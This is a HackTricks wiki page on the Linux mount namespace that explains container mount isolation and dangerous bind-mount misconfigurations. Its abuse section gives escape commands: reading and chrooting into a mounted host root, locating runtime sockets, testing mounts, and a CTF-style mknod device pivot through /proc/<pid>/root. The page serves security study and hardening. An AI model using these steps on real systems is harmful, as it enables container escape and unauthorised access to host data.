mount-namespace.md (8951B)
1 --- 2 title: "Mount Namespace" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Mount Namespace 14 15 ## Overview 16 17 The mount namespace controls the **mount table** that a process sees. This is one of the most important container isolation features because the root filesystem, bind mounts, tmpfs mounts, procfs view, sysfs exposure, and many runtime-specific helper mounts are all expressed through that mount table. Two processes may both access `/`, `/proc`, `/sys`, or `/tmp`, but what those paths resolve to depends on the mount namespace they are in. 18 19 From a container-security perspective, the mount namespace is often the difference between "this is a neatly prepared application filesystem" and "this process can directly see or influence the host filesystem". That is why bind mounts, `hostPath` volumes, privileged mount operations, and writable `/proc` or `/sys` exposures all revolve around this namespace. 20 21 ## Operation 22 23 When a runtime launches a container, it usually creates a fresh mount namespace, prepares a root filesystem for the container, mounts procfs and other helper filesystems as needed, and then optionally adds bind mounts, tmpfs mounts, secrets, config maps, or host paths. Once that process is running inside the namespace, the set of mounts it sees is largely decoupled from the host's default view. The host may still see the real underlying filesystem, but the container sees the version assembled for it by the runtime. 24 25 This is powerful because it lets the container believe it has its own root filesystem even though the host is still managing everything. It is also dangerous because if the runtime exposes the wrong mount, the process suddenly gains visibility into host resources that the rest of the security model may not have been designed to protect. 26 27 ## Lab 28 29 You can create a private mount namespace with: 30 31 ```bash 32 sudo unshare --mount --fork bash 33 mount --make-rprivate / 34 mkdir -p /tmp/ns-lab 35 mount -t tmpfs tmpfs /tmp/ns-lab 36 mount | grep ns-lab 37 ``` 38 39 If you open another shell outside that namespace and inspect the mount table, you will see that the tmpfs mount exists only inside the isolated mount namespace. This is a useful exercise because it shows that mount isolation is not abstract theory; the kernel is literally presenting a different mount table to the process. 40 If you open another shell outside that namespace and inspect the mount table, the tmpfs mount will exist only inside the isolated mount namespace. 41 42 Inside containers, a quick comparison is: 43 44 ```bash 45 docker run --rm debian:stable-slim mount | head 46 docker run --rm -v /:/host debian:stable-slim mount | grep /host 47 ``` 48 49 The second example demonstrates how easy it is for a runtime configuration to punch a huge hole through the filesystem boundary. 50 51 ## Runtime Usage 52 53 Docker, Podman, containerd-based stacks, and CRI-O all rely on a private mount namespace for normal containers. Kubernetes builds on top of the same mechanism for volumes, projected secrets, config maps, and `hostPath` mounts. Incus/LXC environments also rely heavily on mount namespaces, especially because system containers often expose richer and more machine-like filesystems than application containers do. 54 55 This means that when you review a container filesystem problem, you are usually not looking at an isolated Docker quirk. You are looking at a mount-namespace and runtime-configuration problem expressed through whatever platform launched the workload. 56 57 ## Misconfigurations 58 59 The most obvious and dangerous mistake is exposing the host root filesystem or another sensitive host path through a bind mount, for example `-v /:/host` or a writable `hostPath` in Kubernetes. At that point, the question is no longer "can the container somehow escape?" but rather "how much useful host content is already directly visible and writable?" A writable host bind mount often turns the rest of the exploit into a simple matter of file placement, chrooting, config modification, or runtime socket discovery. 60 61 Another common problem is exposing host `/proc` or `/sys` in ways that bypass the safer container view. These filesystems are not ordinary data mounts; they are interfaces into kernel and process state. If the workload reaches the host versions directly, many of the assumptions behind container hardening stop applying cleanly. 62 63 Read-only protections matter too. A read-only root filesystem does not magically secure a container, but it removes a large amount of attacker staging space and makes persistence, helper-binary placement, and config tampering more difficult. Conversely, a writable root or writable host bind mount gives an attacker room to prepare the next step. 64 65 ## Abuse 66 67 When the mount namespace is misused, attackers commonly do one of four things. They **read host data** that should have remained outside the container. They **modify host configuration** through writable bind mounts. They **mount or remount additional resources** if capabilities and seccomp allow it. Or they **reach powerful sockets and runtime state directories** that let them ask the container platform itself for more access. 68 69 If the container can already see the host filesystem, the rest of the security model changes immediately. 70 71 When you suspect a host bind mount, first confirm what is available and whether it is writable: 72 73 ```bash 74 mount | grep -E ' /host| /mnt| /rootfs|bind' 75 find /host -maxdepth 2 -ls 2>/dev/null | head -n 50 76 touch /host/tmp/ht_test 2>/dev/null && echo "host write works" 77 ``` 78 79 If the host root filesystem is mounted read-write, direct host access is often as simple as: 80 81 ```bash 82 ls -la /host 83 cat /host/etc/passwd | head 84 chroot /host /bin/bash 2>/dev/null || echo "chroot failed" 85 ``` 86 87 If the goal is privileged runtime access rather than direct chrooting, enumerate sockets and runtime state: 88 89 ```bash 90 find /host/run /host/var/run -maxdepth 2 -name '*.sock' 2>/dev/null 91 find /host -maxdepth 4 \( -name docker.sock -o -name containerd.sock -o -name crio.sock \) 2>/dev/null 92 ``` 93 94 If `CAP_SYS_ADMIN` is present, also test whether new mounts can be created from inside the container: 95 96 ```bash 97 mkdir -p /tmp/m 98 mount -t tmpfs tmpfs /tmp/m 2>/dev/null && echo "tmpfs mount works" 99 mount -o bind /host /tmp/m 2>/dev/null && echo "bind mount works" 100 ``` 101 102 ### Full Example: Two-Shell `mknod` Pivot 103 104 A more specialized abuse path appears when the container root user can create block devices, the host and container share a user identity in a useful way, and the attacker already has a low-privilege foothold on the host. In that situation, the container can create a device node such as `/dev/sda`, and the low-privilege host user can later read it through `/proc/<pid>/root/` for the matching container process.<sup>[[1]](#references)</sup> 105 106 Inside the container: 107 108 ```bash 109 cd / 110 mknod sda b 8 0 111 chmod 777 sda 112 echo 'augustus:x:1000:1000:augustus:/home/augustus:/bin/bash' >> /etc/passwd 113 /bin/sh 114 ``` 115 116 From the host, as the matching low-privilege user after locating the container shell PID: 117 118 ```bash 119 ps -auxf | grep /bin/sh 120 grep -a 'HTB{' /proc/<pid>/root/sda 121 ``` 122 123 The important lesson is not the exact CTF string search. It is that mount-namespace exposure through `/proc/<pid>/root/` can let a host user reuse container-created device nodes even when cgroup device policy prevented direct use inside the container itself.<sup>[[1]](#references)</sup> 124 125 ## Checks 126 127 These commands are there to show you the filesystem view the current process is actually living in. The goal is to spot host-derived mounts, writable sensitive paths, and anything that looks broader than a normal application container root filesystem. 128 129 ```bash 130 mount # Simple mount table overview 131 findmnt # Structured mount tree with source and target 132 cat /proc/self/mountinfo | head -n 40 # Kernel-level mount details 133 ``` 134 135 What is interesting here: 136 137 - Bind mounts from the host, especially `/`, `/proc`, `/sys`, runtime state directories, or socket locations, should stand out immediately. 138 - Unexpected read-write mounts are usually more important than large numbers of read-only helper mounts. 139 - `mountinfo` is often the best place to see whether a path is really host-derived or overlay-backed. 140 141 These checks establish **which resources are visible in this namespace**, **which ones are host-derived**, and **which of them are writable or security-sensitive**. 142 143 ## References 144 145 - [1] [When Containers Lie: Escaping Root and Breaking Docker Isolation](https://www.kayssel.com/post/docker-security-2/)